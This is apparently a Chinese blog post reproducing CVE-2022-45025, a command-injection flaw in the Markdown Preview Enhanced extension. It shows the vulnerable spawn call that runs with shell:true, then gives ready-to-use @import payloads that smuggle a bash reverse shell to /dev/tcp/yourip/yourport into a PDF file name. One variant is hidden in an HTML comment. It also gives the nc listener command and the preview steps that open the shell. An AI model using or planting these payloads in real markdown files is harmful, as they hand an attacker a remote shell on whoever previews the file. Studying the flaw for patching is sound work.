CVE-2022-45025 Markdown Preview Enhanced插件预览漏洞复现
@import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf"
The following comment will be recognised by MPE as valid "@import" command:
p4y1oad
漏洞成因
存在漏洞的代码片段如下:
const task = spawn(
"pdf2svg",
[
`"${pdfFilePath}"`,
`"${path.resolve(svgDirectoryPath, svgFilePrefix + "%d.svg")}"`,
"all",
],
{ shell: true },
)
此处没有针对pdfFilePath做审查,同时开启了{shell: true},从而得到一个可利用的点。
漏洞复现
在vps上用nc开启端口监听:
nc -lvvp yourport
在本机的kali虚拟机中安装vscode,安装Markdown Preview Enhanced拓展 (VSCode, Atom)
新建一个markdown文件,填写payload:
@import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf"
The following comment will be recognised by MPE as valid "@import" command:
<!-- @import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf" -->
CTFL+k v开启预览,反弹shell成功
本文来自博客园,作者:sherlson,转载请注明原文链接:https://www.cnblogs.com/sherlson/articles/16987056.html
